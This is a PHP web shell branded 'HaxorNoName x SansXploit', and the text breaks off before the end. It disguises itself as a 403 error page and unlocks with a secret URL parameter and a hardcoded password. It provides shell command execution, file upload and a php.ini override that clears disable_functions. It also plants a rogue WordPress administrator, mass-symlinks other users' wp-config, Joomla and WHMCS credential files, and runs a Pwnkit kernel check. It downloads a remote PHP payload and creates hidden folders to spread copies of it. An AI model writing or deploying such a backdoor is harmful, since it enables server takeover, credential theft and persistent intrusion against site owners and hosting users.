.
<?php
error_reporting(0);
ini_set('display_errors', 0);
date_default_timezone_set('UTC');
// HIDDEN SHELL ACCESS - Only accessible via ?Xcr00t parameter
if (!isset($_GET['Xcr00t'])) {
// Show 403 Forbidden page
header('HTTP/1.0 403 Forbidden');
?>
<!DOCTYPE html>
<html lang="id">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>403 Forbidden </title>
<style>
* {
margin: 0; padding: 0; box-sizing: border-box;
font-family: 'Poppins', sans-serif;
}
body {
height: 100vh;
display: flex;
justify-content: center;
align-items: center;
background: radial-gradient(circle at top, #0a0014, #120022, #1a002f);
color: #fff;
overflow: hidden;
text-align: center;
animation: bgflow 10s ease infinite;
}
@keyframes bgflow {
0% { background-position: 0% 50%; }
50% { background-position: 100% 50%; }
100% { background-position: 0% 50%; }
}
.container {
background: rgba(30, 0, 50, 0.6);
border: 1px solid rgba(200, 0, 255, 0.3);
border-radius: 20px;
padding: 50px;
max-width: 600px;
box-shadow: 0 0 25px rgba(150, 0, 255, 0.4);
backdrop-filter: blur(15px);
animation: fadeIn 1.2s ease;
}
@keyframes fadeIn {
from { opacity: 0; transform: scale(0.95); }
to { opacity: 1; transform: scale(1); }
}
.lock {
font-size: 90px;
color: #b100ff;
text-shadow: 0 0 25px #b100ff, 0 0 50px #7f00ff;
animation: pulse 2.5s infinite ease-in-out;
}
@keyframes pulse {
0% { transform: scale(1); opacity: 1; }
50% { transform: scale(1.08); opacity: 0.8; }
100% { transform: scale(1); opacity: 1; }
}
h1 {
font-size: 6rem;
margin: 10px 0;
background: linear-gradient(90deg, #b100ff, #ff00ff, #7f00ff);
-webkit-background-clip: text;
-webkit-text-fill-color: transparent;
text-shadow: 0 0 30px rgba(180, 0, 255, 0.5);
}
h2 {
font-size: 1.8rem;
font-weight: 300;
color: #c9a9ff;
margin-bottom: 20px;
}
.code {
display: inline-block;
background: rgba(100, 0, 150, 0.25);
border: 1px solid rgba(200, 0, 255, 0.4);
padding: 10px 25px;
border-radius: 50px;
color: #d09bff;
margin-bottom: 25px;
font-size: 1rem;
}
p {
font-size: 1.1rem;
line-height: 1.7;
color: #d3c3ff;
margin-bottom: 25px;
}
.actions {
display: flex;
justify-content: center;
gap: 15px;
flex-wrap: wrap;
}
.btn {
text-decoration: none;
padding: 12px 30px;
border-radius: 50px;
font-weight: 600;
transition: all 0.3s ease;
}
.btn-primary {
background: linear-gradient(90deg, #b100ff, #7f00ff);
color: #fff;
box-shadow: 0 0 20px rgba(150, 0, 255, 0.5);
}
.btn-secondary {
border: 1px solid rgba(255,255,255,0.3);
color: #c9a9ff;
background: transparent;
}
.btn:hover {
transform: translateY(-3px);
box-shadow: 0 0 25px rgba(190, 0, 255, 0.5);
}
footer {
position: absolute;
bottom: 15px;
width: 100%;
text-align: center;
font-size: 0.85rem;
color: rgba(255,255,255,0.4);
}
footer span {
color: #b100ff;
font-weight: 600;
}
@media (max-width: 768px) {
.container { padding: 30px 20px; }
h1 { font-size: 4rem; }
.actions { flex-direction: column; }
}
</style>
</head>
<body>
<div class="container">
<div class="lock">🔒</div>
<h1>403</h1>
<h2>Akses Dilarang</h2>
<div class="code">Error 403: Forbidden</div>
<p>Kamu tidak memiliki izin untuk mengakses halaman ini.<br>
Jika kamu yakin ini kesalahan, hubungi administrator sistem.</p>
<div class="actions">
<a href="/" class="btn btn-primary">🏠 Ke Halaman Utama</a>
<a href="javascript:history.back()" class="btn btn-secondary">⬅️ Kembali</a>
</div>
</div>
</body>
</html>
<?php
exit;
}
// SansXploit SHELL - Authentication Required
session_start();
$auth_password = 'BabyXcr00t'; // Şifre buraya
if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) {
if (isset($_POST['password']) && $_POST['password'] === $auth_password) {
$_SESSION['authenticated'] = true;
header('Location: ' . $_SERVER['PHP_SELF'] . '?Xcr00t');
exit;
}
// Login form
?>
<!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Xcr00toname x SansXploit</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
body {
background:
radial-gradient(circle at 20% 80%, rgba(120, 0, 255, 0.1) 0%, transparent 50%),
radial-gradient(circle at 80% 20%, rgba(200, 0, 255, 0.1) 0%, transparent 50%),
radial-gradient(circle at 40% 40%, rgba(100, 0, 200, 0.05) 0%, transparent 50%),
linear-gradient(135deg, #0a0a0a 0%, #120929 50%, #0a0615 100%);
color: #e6e6ff;
font-family: 'Rajdhani', 'Courier New', monospace;
min-height: 100vh;
overflow: hidden;
position: relative;
}
/* NEURAL NETWORK BACKGROUND */
.neural-network {
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
z-index: 0;
}
/* CYBER GRID */
.cyber-grid {
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
background:
linear-gradient(90deg, transparent 95%, rgba(138, 43, 226, 0.03) 100%),
linear-gradient(0deg, transparent 95%, rgba(138, 43, 226, 0.03) 100%);
background-size: 50px 50px;
z-index: 1;
}
/* MAIN CONTAINER */
.quantum-terminal {
position: relative;
z-index: 10;
max-width: 800px;
margin: 50px auto;
background: rgba(10, 5, 25, 0.7);
border: 1px solid rgba(138, 43, 226, 0.3);
border-radius: 20px;
backdrop-filter: blur(15px);
box-shadow:
0 0 100px rgba(138, 43, 226, 0.2),
inset 0 0 50px rgba(138, 43, 226, 0.1);
overflow: hidden;
}
/* TERMINAL HEADER */
.terminal-header {
background: linear-gradient(90deg, rgba(138, 43, 226, 0.2), rgba(148, 0, 211, 0.2));
padding: 20px 30px;
border-bottom: 1px solid rgba(138, 43, 226, 0.3);
position: relative;
}
.header-glow {
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
background: linear-gradient(90deg,
transparent,
rgba(138, 43, 226, 0.1),
transparent);
animation: headerScan 3s linear infinite;
}
@keyframes headerScan {
0% { transform: translateX(-100%); }
100% { transform: translateX(100%); }
}
.title-main {
font-size: 2.8em;
font-weight: 700;
background: linear-gradient(45deg, #da70d6, #8a2be2, #4b0082);
-webkit-background-clip: text;
-webkit-text-fill-color: transparent;
text-shadow: 0 0 30px rgba(138, 43, 226, 0.5);
letter-spacing: 3px;
text-transform: uppercase;
}
.title-sub {
font-size: 1.1em;
color: #c9a0ff;
margin-top: 5px;
letter-spacing: 8px;
font-weight: 300;
}
/* ACCESS PANEL */
.access-panel {
padding: 60px 40px;
text-align: center;
}
.security-level {
display: inline-block;
background: rgba(138, 43, 226, 0.2);
border: 1px solid #8a2be2;
padding: 10px 20px;
border-radius: 25px;
margin-bottom: 40px;
font-size: 0.9em;
color: #da70d6;
letter-spacing: 2px;
}
.password-container {
position: relative;
margin: 40px 0;
}
.password-input {
background: rgba(20, 10, 40, 0.6);
border: 2px solid #8a2be2;
border-radius: 15px;
padding: 25px 30px;
width: 100%;
max-width: 500px;
font-size: 18px;
color: #e6ccff;
font-family: 'Courier New', monospace;
letter-spacing: 3px;
transition: all 0.3s ease;
outline: none;
}
.password-input:focus {
box-shadow:
0 0 40px rgba(138, 43, 226, 0.4),
inset 0 0 20px rgba(138, 43, 226, 0.1);
border-color: #da70d6;
transform: scale(1.02);
}
.input-glow {
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
border-radius: 15px;
background: linear-gradient(45deg,
transparent,
rgba(138, 43, 226, 0.1),
transparent);
animation: inputPulse 2s ease-in-out infinite;
pointer-events: none;
}
@keyframes inputPulse {
0%, 100% { opacity: 0.3; }
50% { opacity: 0.7; }
}
/* QUANTUM BUTTON */
.quantum-button {
background: linear-gradient(135deg, #8a2be2, #9400d3, #4b0082);
border: none;
border-radius: 15px;
padding: 20px 50px;
font-size: 18px;
font-weight: 600;
color: white;
cursor: pointer;
transition: all 0.3s ease;
position: relative;
overflow: hidden;
text-transform: uppercase;
letter-spacing: 2px;
margin-top: 20px;
}
.quantum-button::before {
content: '';
position: absolute;
top: -50%;
left: -50%;
width: 200%;
height: 200%;
background: linear-gradient(45deg,
transparent,
rgba(255,255,255,0.1),
transparent);
transform: rotate(45deg);
transition: all 0.6s ease;
}
.quantum-button:hover::before {
transform: rotate(45deg) translate(50%, 50%);
}
.quantum-button:hover {
transform: translateY(-5px);
box-shadow:
0 15px 30px rgba(138, 43, 226, 0.4),
0 5px 15px rgba(138, 43, 226, 0.3);
}
/* STATUS INDICATOR */
.status-indicator {
display: flex;
align-items: center;
justify-content: center;
margin-top: 30px;
gap: 15px;
}
.status-dot {
width: 12px;
height: 12px;
border-radius: 50%;
background: #8a2be2;
animation: statusPulse 1.5s ease-in-out infinite;
}
.status-dot:nth-child(2) { animation-delay: 0.5s; }
.status-dot:nth-child(3) { animation-delay: 1s; }
@keyframes statusPulse {
0%, 100% {
opacity: 0.3;
transform: scale(0.8);
}
50% {
opacity: 1;
transform: scale(1.2);
box-shadow: 0 0 20px #8a2be2;
}
}
/* ERROR MESSAGE */
.quantum-error {
color: #ff6b6b;
margin-top: 25px;
font-size: 16px;
text-shadow: 0 0 10px rgba(255, 107, 107, 0.5);
animation: quantumError 0.6s ease-out;
background: rgba(255, 107, 107, 0.1);
padding: 15px;
border-radius: 10px;
border: 1px solid rgba(255, 107, 107, 0.3);
}
@keyframes quantumError {
0% {
transform: translateY(-20px);
opacity: 0;
}
100% {
transform: translateY(0);
opacity: 1;
}
}
/* FOOTER */
.terminal-footer {
background: rgba(10, 5, 25, 0.8);
padding: 20px;
border-top: 1px solid rgba(138, 43, 226, 0.2);
text-align: center;
font-size: 0.9em;
color: #9370db;
letter-spacing: 1px;
}
.footer-text {
display: flex;
justify-content: center;
gap: 30px;
flex-wrap: wrap;
}
/* RESPONSIVE */
@media (max-width: 768px) {
.quantum-terminal {
margin: 20px;
border-radius: 15px;
}
.title-main {
font-size: 2em;
}
.access-panel {
padding: 40px 20px;
}
.password-input {
padding: 20px;
font-size: 16px;
}
}
</style>
</head>
<body>
<!-- NEURAL NETWORK BACKGROUND -->
<canvas class="neural-network" id="neuralNetwork"></canvas>
<div class="cyber-grid"></div>
<!-- QUANTUM TERMINAL -->
<div class="quantum-terminal">
<!-- TERMINAL HEADER -->
<div class="terminal-header">
<div class="header-glow"></div>
<div class="title-main"> HaxorNoName x SansXploit</div>
<div class="title-sub">Pencuri Dilarang Masuk</div>
</div>
<!-- ACCESS PANEL -->
<div class="access-panel">
<div class="security-level">
Welcome To Hidden Shell
</div>
<form method="post">
<div class="password-container">
<input type="password" name="password" class="password-input"
placeholder="ENTER QUANTUM KEY..." required>
<div class="input-glow"></div>
</div>
<button type="submit" class="quantum-button">
Press To Login
</button>
</form>
<?php if (isset($_POST['password'])): ?>
<div class="quantum-error">
⚠️ KEY REJECTED - ACCESS DENIED
</div>
<?php endif; ?>
<!-- STATUS INDICATOR -->
<div class="status-indicator">
<div class="status-dot"></div>
<div class="status-dot"></div>
<div class="status-dot"></div>
</div>
</div>
<!-- TERMINAL FOOTER -->
<div class="terminal-footer">
<div class="footer-text">
<span>Xcr00toname x SansXploit</span>
<span>No System Is Safe</span>
</div>
</div>
</div>
<script>
// NEURAL NETWORK ANIMATION
const canvas = document.getElementById('neuralNetwork');
const ctx = canvas.getContext('2d');
function resizeCanvas() {
canvas.width = window.innerWidth;
canvas.height = window.innerHeight;
}
resizeCanvas();
window.addEventListener('resize', resizeCanvas);
class Node {
constructor(x, y) {
this.x = x;
this.y = y;
this.vx = (Math.random() - 0.5) * 0.5;
this.vy = (Math.random() - 0.5) * 0.5;
this.radius = Math.random() * 2 + 1;
}
update() {
this.x += this.vx;
this.y += this.vy;
if (this.x < 0 || this.x > canvas.width) this.vx *= -1;
if (this.y < 0 || this.y > canvas.height) this.vy *= -1;
}
draw() {
ctx.beginPath();
ctx.arc(this.x, this.y, this.radius, 0, Math.PI * 2);
ctx.fillStyle = `rgba(138, 43, 226, ${0.3 + Math.random() * 0.2})`;
ctx.fill();
}
}
class Connection {
constructor(node1, node2) {
this.node1 = node1;
this.node2 = node2;
this.length = Math.hypot(node1.x - node2.x, node1.y - node2.y);
}
draw() {
const dx = this.node1.x - this.node2.x;
const dy = this.node1.y - this.node2.y;
const distance = Math.sqrt(dx * dx + dy * dy);
if (distance < 200) {
ctx.beginPath();
ctx.moveTo(this.node1.x, this.node1.y);
ctx.lineTo(this.node2.x, this.node2.y);
ctx.strokeStyle = `rgba(138, 43, 226, ${0.1 * (1 - distance / 200)})`;
ctx.lineWidth = 0.5;
ctx.stroke();
}
}
}
const nodes = [];
const connections = [];
// Create nodes
for (let i = 0; i < 50; i++) {
nodes.push(new Node(
Math.random() * canvas.width,
Math.random() * canvas.height
));
}
// Create connections
for (let i = 0; i < nodes.length; i++) {
for (let j = i + 1; j < nodes.length; j++) {
connections.push(new Connection(nodes[i], nodes[j]));
}
}
function animate() {
ctx.fillStyle = 'rgba(10, 5, 25, 0.05)';
ctx.fillRect(0, 0, canvas.width, canvas.height);
nodes.forEach(node => {
node.update();
node.draw();
});
connections.forEach(connection => {
connection.draw();
});
requestAnimationFrame(animate);
}
animate();
// Add typing effect to password placeholder
const passwordInput = document.querySelector('.password-input');
const originalPlaceholder = 'ENTER PASS KEY...';
let placeholderText = '';
let charIndex = 0;
let isDeleting = false;
function typePlaceholder() {
if (isDeleting) {
placeholderText = originalPlaceholder.substring(0, placeholderText.length - 1);
} else {
placeholderText = originalPlaceholder.substring(0, placeholderText.length + 1);
}
passwordInput.placeholder = placeholderText + '█';
if (!isDeleting && placeholderText === originalPlaceholder) {
setTimeout(() => isDeleting = true, 1000);
} else if (isDeleting && placeholderText === '') {
isDeleting = false;
setTimeout(typePlaceholder, 500);
return;
}
setTimeout(typePlaceholder, isDeleting ? 50 : 100);
}
// Start typing effect when page loads
setTimeout(typePlaceholder, 1000);
</script>
</body>
</html>
<?php
exit;
}
function show_notification($message, $type = 'danger') {
echo '<div class="notification-overlay" style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.7); z-index: 9999; display: flex; justify-content: center; align-items: center;">
<div class="alert alert-' . $type . ' notification-box" style="max-width: 500px; width: 90%;">
<button type="button" class="btn-close float-end" onclick="this.parentElement.parentElement.remove()"></button>
<p class="text-center mb-0">' . htmlspecialchars($message) . '</p>
</div>
</div>';
}
function create_403bp($url, $path) {
$randname = uniqid('aurora_', true) . '.php';
$target = $path . DIRECTORY_SEPARATOR . $randname;
// Try wget first
$wget_cmd = "wget '{$url}' -O '{$target}' 2>&1";
@exec($wget_cmd, $output, $return_var);
if ($return_var === 0 && file_exists($target)) {
return $randname;
}
// Try curl if wget fails
$ch = curl_init($url);
$fp = fopen($target, 'w+');
if ($ch && $fp) {
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
if (curl_exec($ch)) {
fclose($fp);
curl_close($ch);
return $randname;
}
fclose($fp);
curl_close($ch);
}
return false;
}
const APP_NAME = 'HaxorNoName x SansXploit';
const APP_VERSION = '3';
const SCAN_READ_LIMIT = 5000;
$current_version = '3';
if (version_compare(PHP_VERSION, '5.4.0', '<')) {
die('PHP version 5.4 or higher required');
}
$required_extensions = ['mysqli', 'curl', 'json'];
foreach ($required_extensions as $ext) {
if (!extension_loaded($ext)) {
die("Required PHP extension '{$ext}' is not loaded");
}
}
header('Content-Type: text/html; charset=UTF-8');
if (ini_get('memory_limit') < 256) {
@ini_set('memory_limit', '256M');
}
function customErrorHandler($errno, $errstr, $errfile, $errline) {
if (!(error_reporting() & $errno)) {
return false;
}
switch ($errno) {
case E_ERROR:
case E_CORE_ERROR:
case E_COMPILE_ERROR:
case E_PARSE:
$error_type = 'Fatal Error';
break;
case E_WARNING:
case E_CORE_WARNING:
case E_COMPILE_WARNING:
case E_USER_WARNING:
$error_type = 'Warning';
break;
case E_NOTICE:
case E_USER_NOTICE:
$error_type = 'Notice';
break;
default:
$error_type = 'Unknown';
break;
}
error_log("PHP {$error_type}: {$errstr} in {$errfile} on line {$errline}");
if ($errno == E_ERROR || $errno == E_CORE_ERROR || $errno == E_COMPILE_ERROR || $errno == E_PARSE) {
die("A critical error occurred. Please check the error logs.");
}
return true;
}
set_error_handler("customErrorHandler");
$required_paths = [__DIR__, sys_get_temp_dir()];
foreach ($required_paths as $path) {
if (!is_writable($path)) {
die("Directory not writable: {$path}");
}
}
if (!isset($_SESSION) && !headers_sent()) {
session_start();
}
ini_set('max_execution_time', 30);
ini_set('memory_limit', '256M');
ini_set('realpath_cache_size', '4096k');
ini_set('realpath_cache_ttl', 600);
function checkUpdate() {
return;
}
const SYMLINK_DIR = 'AuroraSym';
const PERL_DIR = 'perl';
function fmtSize($bytes) {
static $types = ['B', 'KB', 'MB', 'GB', 'TB'];
static $cache = [];
$key = (string)$bytes;
if (isset($cache[$key])) {
return $cache[$key];
}
for ($i = 0; $bytes >= 1024 && $i < 4; $bytes /= 1024, $i++);
$result = round($bytes, 2) . ' ' . $types[$i];
$cache[$key] = $result;
return $result;
}
function ext($file)
{
return strtolower(pathinfo($file, PATHINFO_EXTENSION));
}
function icon($file) {
static $iconCache = [];
static $icons = [
'php' => '<i class="fa-brands fa-php text-indigo"></i>',
'html' => '<i class="fa-brands fa-html5 text-danger"></i>',
'css' => '<i class="fa-brands fa-css3 text-primary"></i>',
'js' => '<i class="fa-brands fa-js text-warning"></i>',
'py' => '<i class="fa-brands fa-python text-warning"></i>',
'.htaccess' => '<i class="fa-solid fa-lock text-danger"></i>',
'image' => '<i class="fa-regular fa-image text-success"></i>',
'default' => '<i class="fa-solid fa-file text-muted"></i>'
];
if (isset($iconCache[$file])) {
return $iconCache[$file];
}
if ($file === '.htaccess') {
return $iconCache[$file] = $icons['.htaccess'];
}
$ext = ext($file);
if (isset($icons[$ext])) {
return $iconCache[$file] = $icons[$ext];
}
if (in_array($ext, ['jpg', 'jpeg', 'png', 'gif', 'webp'])) {
return $iconCache[$file] = $icons['image'];
}
return $iconCache[$file] = $icons['default'];
}
function enc($path)
{
return base64_encode($path);
}
function dec($path)
{
return base64_decode($path);
}
function perms($file)
{
return substr(sprintf('%o', fileperms($file)), -4);
}
function suggest_exploit()
{
$uname = php_uname();
$parts = explode(" ", $uname);
$kernel = isset($parts[2]) ? $parts[2] : '0.0.0';
$version = explode("-", $kernel)[0];
$numbers = explode(".", $version);
$major = isset($numbers[0]) ? $numbers[0] : '0';
$minor = isset($numbers[1]) ? $numbers[1] : '0';
$patch = isset($numbers[2]) ? $numbers[2] : '0';
return "$major.$minor.$patch";
}
function check_pwnkit_compatibility()
{
$kernel = suggest_exploit();
$compatible_versions = [
'2.6.', '3.0.', '3.1.', '3.2.', '3.3.', '3.4.', '3.5.', '3.6.',
'3.7.', '3.8.', '3.9.', '3.10.', '3.11.', '3.12.', '3.13.', '3.14.',
'3.15.', '3.16.', '3.17.', '3.18.', '3.19.', '4.0.', '4.1.', '4.2.',
'3.3.', '4.4.', '4.5.', '4.6.', '4.7.', '4.8.', '4.9.', '4.10.',
'4.11.', '4.12.', '4.13.', '4.14.', '4.15.', '4.16.', '4.17.', '4.18.',
'4.19.', '5.0.', '5.1.', '5.2.', '5.3.'
];
foreach ($compatible_versions as $version) {
if (strpos($kernel, $version) === 0) {
return true;
}
}
return false;
}
function cmd($command) {
try {
$output = '';
// Sanitize command input
$command = escapeshellcmd($command);
// Check if command execution is allowed
if (ini_get('safe_mode') || !function_exists('exec')) {
throw new Exception('Command execution is disabled');
}
// Try different command execution methods
if (function_exists('exec')) {
exec($command . ' 2>&1', $output_array, $return_var);
if ($return_var !== 0) {
throw new Exception("Command failed with code: {$return_var}");
}
$output = implode("\n", $output_array);
} elseif (function_exists('shell_exec')) {
$output = shell_exec($command . ' 2>&1');
if ($output === null) {
throw new Exception('Command execution failed');
}
} elseif (function_exists('system')) {
ob_start();
system($command . ' 2>&1', $return_var);
$output = ob_get_clean();
if ($return_var !== 0) {
throw new Exception("Command failed with code: {$return_var}");
}
} else {
throw new Exception('No command execution function available');
}
return $output;
} catch (Exception $e) {
error_log("Command execution error: " . $e->getMessage());
return "Error: " . $e->getMessage();
}
}
function addWordpressAdmin($dbHost, $dbUser, $dbPass, $dbName, $wpUser, $wpPass)
{
try {
$conn = new mysqli($dbHost, $dbUser, $dbPass, $dbName);
if ($conn->connect_error) return false;
$hashedPass = password_hash($wpPass, PASSWORD_DEFAULT);
$sql = "INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, display_name)
VALUES (?, ?, ?, ?, NOW(), ?)";
$stmt = $conn->prepare($sql);
$stmt->bind_param("sssss", $wpUser, $hashedPass, $wpUser, "admin@local.host", $wpUser);
if ($stmt->execute()) {
$userId = $stmt->insert_id;
$metaSql = "INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)";
$capabilities = serialize(array('administrator' => true));
$metaStmt = $conn->prepare($metaSql);
$metaStmt->bind_param("iss", $userId, "wp_capabilities", $capabilities);
$metaStmt->execute();
$levelSql = "INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (?, ?, '10')";
$levelStmt = $conn->prepare($levelSql);
$levelStmt->bind_param("is", $userId, "wp_user_level");
$levelStmt->execute();
return true;
}
return false;
} catch (Exception $e) {
return false;
}
}
function generatePhpIni()
{
return file_put_contents(__DIR__ . DIRECTORY_SEPARATOR . 'php.ini', "disable_functions=none\n") !== false;
}
function initSymlinkContainer()
{
if (!is_dir(SYMLINK_DIR)) mkdir(SYMLINK_DIR, 0777, true);
$hta = SYMLINK_DIR . DIRECTORY_SEPARATOR . '.htaccess';
if (!file_exists($hta)) {
$rules = "Options +FollowSymLinks +Indexes\nOrder Allow,Deny\nAllow from all\nRequire all granted\n";
file_put_contents($hta, $rules);
}
// Ensure proper permissions
chmod(SYMLINK_DIR, 0755);
if (file_exists($hta)) {
chmod($hta, 0644);
}
}
function createSymlink($src, $alias)
{
if (!function_exists('symlink')) {
show_notification('Symlink function is not enabled on this server');
return false;
}
$target = SYMLINK_DIR . DIRECTORY_SEPARATOR . $alias;
if (!file_exists($target)) {
if (!@symlink($src, $target)) {
show_notification('Failed to create symlink. Check permissions.');
return false;
}
return true;
}
return true;
}
function manualSymlink($src, $alias)
{
initSymlinkContainer();
createSymlink($src, $alias);
}
function extractSystemUsers()
{
$users = [];
$passwdFile = '/etc/passwd';
if (file_exists($passwdFile) && is_readable($passwdFile)) {
foreach (file($passwdFile) as $line) {
$cols = explode(':', $line);
if (count($cols) >= 3) {
$name = $cols[0];
$uid = (int)$cols[2];
if ($uid >= 500) $users[] = $name;
}
}
}
return array_unique($users);
}
function massSymlinkConfigs($usernames)
{
initSymlinkContainer();
if (!file_exists(SYMLINK_DIR . DIRECTORY_SEPARATOR . 'root')) @symlink('/', SYMLINK_DIR . DIRECTORY_SEPARATOR . 'root');
$patterns = [
'wp-config' => '/public_html/wp-config.php',
'word-wp' => '/public_html/wordpress/wp-config.php',
'wpblog' => '/public_html/blog/wp-config.php',
'wp-old' => '/public_html/wp/wp-config.php',
'wp-backup' => '/public_html/backup/wp-config.php',
'wp-old2' => '/public_html/old/wp-config.php',
'wp-2020' => '/public_html/2020/wp-config.php',
'wp-2021' => '/public_html/2021/wp-config.php',
'wp-2022' => '/public_html/2022/wp-config.php',
'wp-2023' => '/public_html/2023/wp-config.php',
'wp-new' => '/public_html/new/wp-config.php',
'wp-dev' => '/public_html/dev/wp-config.php',
'wp-stage' => '/public_html/staging/wp-config.php',
'wp-test' => '/public_html/test/wp-config.php',
'joomla-or-whmcs'=> '/public_html/configuration.php',
'joomla' => '/public_html/joomla/configuration.php',
'joomla-old' => '/public_html/old/configuration.php',
'joomla-backup' => '/public_html/backup/configuration.php',
'joomla-dev' => '/public_html/dev/configuration.php',
'vbinc' => '/public_html/vb/includes/config.php',
'vb' => '/public_html/includes/config.php',
'vb-old' => '/public_html/old/includes/config.php',
'vb-backup' => '/public_html/backup/includes/config.php',
'conf_global' => '/public_html/conf_global.php',
'inc' => '/public_html/inc/config.php',
'config' => '/public_html/config.php',
'Settings' => '/public_html/Settings.php',
'sites' => '/public_html/sites/default/settings.php',
'whm' => '/public_html/whm/configuration.php',
'whmcs' => '/public_html/whmcs/configuration.php',
'supportwhmcs' => '/public_html/support/configuration.php',
'WHM' => '/public_html/whmc/WHM/configuration.php',
'whmc' => '/public_html/whm/WHMCS/configuration.php',
'WHMcs' => '/public_html/whm/whmcs/configuration.php',
'whmcsupp' => '/public_html/support/configuration.php',
'whmcs-cli' => '/public_html/clients/configuration.php',
'whmcs-cl' => '/public_html/client/configuration.php',
'whmcs-CL' => '/public_html/clientes/configuration.php',
'whmcs-Cl' => '/public_html/cliente/configuration.php',
'whmcs-csup' => '/public_html/clientsupport/configuration.php',
'whmcs-bill' => '/public_html/billing/configuration.php',
'whmcs-old' => '/public_html/old/configuration.php',
'whmcs-backup' => '/public_html/backup/configuration.php',
'admin-conf' => '/public_html/admin/config.php',
'admin-old' => '/public_html/admin/old/config.php',
'admin-backup' => '/public_html/admin/backup/config.php',
'home1-wp' => '/home1/public_html/wp-config.php',
'home2-wp' => '/home2/public_html/wp-config.php',
'home3-wp' => '/home3/public_html/wp-config.php',
'home4-wp' => '/home4/public_html/wp-config.php',
'home5-wp' => '/home5/public_html/wp-config.php',
'html-wp' => '/html/wp-config.php',
'html-pub-wp' => '/html/public/wp-config.php',
'www-wp' => '/www/wp-config.php',
'www-pub-wp' => '/www/public/wp-config.php'
];
foreach ($usernames as $user) {
$user = trim($user);
if ($user === '') continue;
foreach ($patterns as $postfix => $path) {
createSymlink("/home/" . $user . $path, $user . ".." . $postfix);
}
}
}
$current_dir = dirname(__FILE__);
$path = isset($_GET['p']) ? dec($_GET['p']) : $current_dir;
if (!is_dir($path)) {
$path = $current_dir;
}
define('PATH', $path);
$action = isset($_GET['act']) ? $_GET['act'] : 'list';
$target = isset($_GET['file']) ? $_GET['file'] : '';
if (isset($_POST['upload'])) {
$dest = PATH . DIRECTORY_SEPARATOR . basename($_FILES['file']['name']);
if (move_uploaded_file($_FILES['file']['tmp_name'], $dest)) {
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=success');
} else {
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=failed');
}
exit;
}
$url1 = 'https://aurorafilemanager.github.io/Aurora.php';
function download_content($url) {
try {
// Validate URL
if (!filter_var($url, FILTER_VALIDATE_URL)) {
throw new Exception("Invalid URL format");
}
// Set timeout and user agent
$ctx = stream_context_create([
'http' => [
'timeout' => 30,
'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'follow_location' => true
],
'ssl' => [
'verify_peer' => false,
'verify_peer_name' => false
]
]);
// Try file_get_contents first
$content = @file_get_contents($url, false, $ctx);
if ($content !== false) {
return $content;
}
// Try cURL if file_get_contents fails
if (function_exists('curl_init')) {
$content = download_content_with_curl($url);
if ($content !== false) {
return $content;
}
}
// Try fopen as last resort
$content = download_content_with_fopen($url);
if ($content !== false) {
return $content;
}
throw new Exception("All download methods failed");
} catch (Exception $e) {
error_log("Download error: " . $e->getMessage());
throw new Exception("Failed to download content: " . $e->getMessage());
}
}
function download_content_with_curl($url) {
try {
$ch = curl_init($url);
if ($ch === false) {
throw new Exception("Failed to initialize cURL");
}
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_MAXREDIRS => 5,
CURLOPT_TIMEOUT => 30,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
]);
$content = curl_exec($ch);
$error = curl_error($ch);
$errno = curl_errno($ch);
curl_close($ch);
if ($content === false) {
throw new Exception("cURL error ({$errno}): {$error}");
}
return $content;
} catch (Exception $e) {
error_log("cURL error: " . $e->getMessage());
return false;
}
}
function download_content_with_fopen($url) {
try {
$content = '';
$handle = @fopen($url, 'r');
if ($handle === false) {
throw new Exception("Failed to open URL");
}
stream_set_timeout($handle, 30);
while (!feof($handle)) {
$chunk = fread($handle, 8192);
if ($chunk === false) {
throw new Exception("Failed to read from stream");
}
$content .= $chunk;
}
fclose($handle);
if (empty($content)) {
throw new Exception("No content received");
}
return $content;
} catch (Exception $e) {
error_log("fopen error: " . $e->getMessage());
return false;
}
}
// Remove duplicate function definitions
function get_full_url($filePath) {
$protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off' || $_SERVER['SERVER_PORT'] == 443) ? "https://" : "http://";
$domainName = $_SERVER['HTTP_HOST'];
$relativePath = str_replace($_SERVER['DOCUMENT_ROOT'], '', $filePath);
return $protocol . $domainName . $relativePath;
}
function create_files_in_subdirectories($rootDir, $url) {
try {
// Validate inputs
if (!is_dir($rootDir)) {
throw new Exception("Invalid root directory");
}
// Define common WordPress and system folders to create if they don't exist
$folders_to_create = array(
'.config',
'.wp-content',
'.wp-includes',
'.wp-admin',
'.system',
'.tmp',
'.cache',
'.local'
);
// Create hidden folders if they don't exist
foreach ($folders_to_create as $folder) {
$folder_path = $rootDir . DIRECTORY_SEPARATOR . $folder;
if (!file_exists($folder_path)) {if (@mkdir($folder_path, 0755, true)) {
// Set folder as hidden on Windows
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
@system("attrib +h \"$folder_path\"");
}
}
}
}
// Get content first to avoid multiple downloads
$content = download_content($url);
if (!$content) {
throw new Exception("Failed to download content from URL");
}
$created = false;
// Include both existing and newly created directories
